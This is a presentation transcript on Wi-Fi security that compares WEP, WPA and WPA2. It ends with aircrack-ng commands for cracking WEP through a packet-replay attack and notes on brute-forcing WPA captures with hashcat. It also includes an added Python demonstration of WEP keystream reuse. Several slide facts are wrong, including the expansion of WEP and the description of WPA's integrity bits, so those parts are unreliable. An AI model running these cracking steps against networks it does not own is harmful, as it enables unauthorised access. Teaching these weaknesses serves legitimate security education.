OSA vs WEP WPA and WPA II Tools for hacking

Presentation transcript:

Wireless Security
- OSA vs WEP
- WPA and WPA II
- Tools for hacking

OSA vs SKA (1997)
- Open System Association | Shared Key Auth
- OSA: Complete free-for-all, no auth at all
- SKA: Used WEP for authentication
  - Wireless Equivalent Protocol

WEP and why it sucks
- Streaming algorithm
  - RC4: stream cipher in synchronous mode
  - Need to keep sync at all times (wireless is bad at that)
- Per-packet master key re-use
  - Every single packet sent holds the RC4 hash
  - More exposure = more vulnerability
- Limited AP keys
  - WEP only allows 1-4 secret keys, so every AP on the network has to share them

WEP and why it sucks (cont.)
- No AP to client auth
  - MITM attacks are easy
- Confidentiality vulnerabilities in header
  - Headers aren't verified by Integrity Checker
  - Makes redirection attacks easy
- Integrity Checker is basically garbage
- No sequence numbers or timestamps
  - Replay attacks are easy and effective
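The two WEP slides above (keystream re-use and the weak integrity checker), worked through as an added example that is not part of the original presentation. It follows standard WEP encapsulation, where the per-frame RC4 key is the cleartext 24-bit IV prepended to the shared secret and the integrity value is an unkeyed CRC-32; the key, IV, plaintexts and function names are constructed for illustration.

```python
import math
import zlib

def rc4(key, n):
    """Return n bytes of RC4 keystream for the given key."""
    s, j = list(range(256)), 0
    for i in range(256):                       # key scheduling (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i, j, out = 0, 0, bytearray()
    for _ in range(n):                         # keystream output (PRGA)
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):                                 # WEP integrity value: plain CRC-32, no key
    return zlib.crc32(data).to_bytes(4, "little")

def wep_encrypt(secret, iv, plaintext):
    """Frame body = RC4(IV || secret) XOR (plaintext || ICV); the IV is sent in clear."""
    data = plaintext + icv(plaintext)
    return xor(data, rc4(iv + secret, len(data)))

def iv_collision_probability(frames, iv_bits=24):
    """Birthday estimate: chance that two of `frames` random IVs are equal."""
    return 1 - math.exp(-frames * (frames - 1) / (2 * 2 ** iv_bits))

# Constructed sample values (not from the presentation).
SECRET = bytes.fromhex("0102030405")           # 40-bit shared WEP key
IV = b"\x00\x00\x01"                           # 24-bit per-frame IV
P1, P2 = b"GET /index.html ", b"POST /login.php "

def keystream_reuse_leaks_xor():
    """Same IV + same secret => same keystream => c1 XOR c2 == p1 XOR p2."""
    c1, c2 = wep_encrypt(SECRET, IV, P1), wep_encrypt(SECRET, IV, P2)
    return xor(c1, c2)[:len(P1)] == xor(P1, P2)

def crc_is_linear():
    """CRC-32 of an XOR is predictable from the parts, so it cannot act as a MAC."""
    zeros = bytes(len(P1))
    return zlib.crc32(xor(P1, P2)) == zlib.crc32(P1) ^ zlib.crc32(P2) ^ zlib.crc32(zeros)

if __name__ == "__main__":
    print(keystream_reuse_leaks_xor(), crc_is_linear(), round(iv_collision_probability(5000), 2))
```

With randomly chosen IVs, roughly 5,000 frames already give better-than-even odds of a repeated IV, and both properties hold regardless of how long the shared secret is.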

WPA (2003)
- Attempt to re-engineer WEP while using hardware already available
- Movements towards standardization
  - 802.11i: group for increased security
  - WiFi Alliance: standardization between vendors

Improvements on WEP
WPA improvements:
- Integrity checker allowed for 56 bits (stronger keys)
- Passwords sent per session, not per packet
- Auth built on 802.1X framework and TKIP
- Packet sequence numbers (no replay attacks)
- Integrity checker for header and payload (no redirection attacks)

Improvements on WPA
WPA2 (2004):
- Transition to AES instead of RC4
  - Way stronger in general
- Revamped integrity checking
  - Leverage AES and better hardware
  - CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) (wtf)
  - Basically encrypted encapsulation
- More secure key establishment and auth

Aircrack-ng
Suite of tools for assessing WiFi network security:
- Monitoring (packet capturing and processing)
- Attacking (replay attacks, deauths, fake AP, etc.)
- Testing
- Cracking (WEP and WPA PSK I+II)

Using it to break WEP
- iwconfig
  - Check for wireless capabilities
- airmon-ng start wlan0
  - Set your wireless card to monitor mode
- airodump-ng mon0
  - Start monitoring for crazy stuff in the air
  - Searching for APs (John's iPhone)
- airodump-ng --bssid "mac" -c "channel" -w WEPCrack mon0

Using it to break WEP
- Open a different terminal
- aireplay-ng -3 -b 'AP_mac' -h 'host_mac' mon0
  - Initiate a replay attack
  - Looking for about 15k+ #Data
- aircrack-ng WEPCrack-01.cap
  - Cracking
  - Just wait for it and hope, basically

Using it to crack WPA
- Basically the same method besides the last part
- WPA is strong enough that you have to bruteforce the pcap instead of doing analysis
- oclHashcat > Aircrack-ng because of rainbow tables and rule based cracking
  - 5 minutes vs 2 hours